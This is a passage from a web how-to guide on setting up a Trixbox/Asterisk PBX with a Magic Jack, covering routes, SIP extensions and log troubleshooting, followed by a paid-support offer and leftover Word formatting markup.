<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>5.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>For Dial Patterns use the wizard and select 7 digits and 10 digits dialing unless you want to setup some special dialing which if you do you are on your own for this article.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>6.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>For “Trunk Sequence” choose the trunk you just created.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>7.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click “Submit changes”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>8.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “Apply changes”</p>
<p class="MsoListParagraphCxSpLast" style="text-indent: -0.25in; padding-left: 30px;"><span><span>9.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “reload</p>
<p class="MsoNormal" style="padding-left: 30px;"><span><!--[if gte vml 1]><v:shape  id="Picture_x0020_15" o:spid="_x0000_i1025" type="#_x0000_t75" alt="outroute.jpg"  style='width:264.75pt;height:354.75pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image013.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image013.jpg"   o:title="outroute" /> </v:shape><![endif]--></span></p>
<p class="MsoNormal" style="text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/outroute.jpg" target="_blank"><img class="aligncenter size-medium wp-image-160" title="outroute" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/outroute-223x300.jpg" alt="" width="223" height="300" /></a></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; text-align: center;"><span style="color: #000000;">Click for a larger image</span><strong><span style="color: red;"><br />
</span></strong></p>
<p class="MsoNormal"><strong><span style="text-decoration: underline;">Creating an Extension:</span></strong></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; padding-left: 30px;"><span><span>1.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “PBX Settings”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>2.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “Extensions”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>3.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Choose “Generic SIP Device”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>4.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Under “User Extension” enter an extension in a numeric format i.e. 101.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>5.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Under “SIP Alias” enter the same number you used for the extension.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>6.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Under “Secret” enter a min 6 character password the longer and more complex the better.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>7.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click “Submit changes”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>8.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “Apply changes”</p>
<p class="MsoNormal"><span><span>9.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “reload</p>
<p class="MsoNormal">This will create a basic extension. Under this setting you can also configure your extensions voicemail and caller ID, but we are keeping this basic for now.</p>
<p class="MsoNormal"><strong><span style="text-decoration: underline;">Creating an Incoming route:</span></strong></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; padding-left: 30px;"><span><span>1.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click “PBX Settings”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>2.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click “Inbound Routes”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>3.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click “Add route”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>4.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Under “Description” enter Magic-in (or other name you want)</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>5.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Under “DID Number” enter your 10 digit Magic Jack number.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>6.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Under “Set Destination” choose “Extension” and select the extension you just created</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>7.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click “Submit changes”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>8.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “Apply changes”</p>
<p class="MsoListParagraphCxSpLast" style="text-indent: -0.25in; padding-left: 30px;"><span><span>9.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “reload”</p>
<p class="MsoNormal">Once all these steps are completed you can configure your smart phone and test. If you are using xlite as your soft phone use the settings you used in the extension creation for your settings in xlite. Or if you are using a different IP phone such as Cisco follow the manufactures directions to configure it.</p>
<p class="MsoNormal"><strong><span style="text-decoration: underline;">Simple Troubleshooting of your Trixbox:</span></strong></p>
<p class="MsoNormal">Asterisk stores all of its events in one log fill called full located in /var/log/asterisk/ to view the log in real time you will need to log in to your Trixbox via shell access as root. Once you are logged into the box issue the command tail –f 10 /var/log/asterisk/full . This will scroll the last 10 lines of the log and any new log entries. Common errors that you will find here is incorrect authentication or issues with registration of the trunk. These are the two biggest issues I have run into while configuring Magic Jack to work with Trixbox.<span> </span>If you see any errors in the log you can simply Google them for detailed answers.</p>
<p class="MsoNormal"><strong><span style="text-decoration: underline;">Services / Help:</span></strong></p>
<p class="MsoNormal">If you bought this document and still cannot get your Magic Jack to work I will provide discounted hourly fees to help you to get yours working. I charge 100 dollars a day, with a 1 day minimum. I require you to ship your Magic Jack or Magic Jacks to me with a tracking number and provide return shipping with tracking as well. Your best bet is to send me the sealed Magic Jacks with the email address you want associated to them as well as the area code you want and let me do them from scratch.</p>
<p class="MsoNormal">If you want me to configure Trixbox system to use your Magic Jacks I will also require remote access to your machines as well as the usernames and passwords to your system. <span> </span>The fee for Trixbox configuration is an additional 30.00 dollars per day.</p>
<p class="MsoNormal">As mention above I will give a discount of 25.00 per day to anyone that bought this document and could not get this working based on information I provided and not due error or lack of ability on their side. I will review everything before accepting work and I do not guarantee anything.</p>
<p class="MsoNormal">
<p class="MsoListParagraphCxSpLast" style="margin-left: 1.5in; text-indent: -1.5in; text-align: left;"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1107304683 0 0 159 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:.5in; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:0in; 	margin-left:.5in; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	